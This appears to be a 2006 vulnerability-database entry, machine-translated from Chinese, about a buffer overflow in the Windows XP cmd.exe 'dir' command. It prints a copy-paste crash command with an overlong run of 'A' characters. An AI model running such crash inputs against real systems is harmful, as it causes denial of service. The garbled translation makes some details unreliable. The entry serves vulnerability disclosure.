Really the dir-overflow-vulnerability warning-the black bar safety net

2006-10-23T00:00:00
ID MYHACK58:62200612462
Type myhack58
Reporter 佚名
Modified 2006-10-23T00:00:00

Description

Just in CN. Tink there to see, ha ha, fun! I tried the following, screenshot as follows:

! /Article/UploadPic/2006-10/20061023103110897.jpg

Windows Command Processor CMD.EXE Buffer Overflow

Execute the following line in cmd.exe (copy-paste).. tested on winxp sp2 (fully patched) on 2006/10/06/17. 5 6

(it is a single command, has been split into multiple lines for readability sake).

%COMSPEC% /K "dir \\?\ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

Direct input dir \\?\ AAA(more than 2 6 0 A A)will also throw an error From abroad a station, the original:<http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html>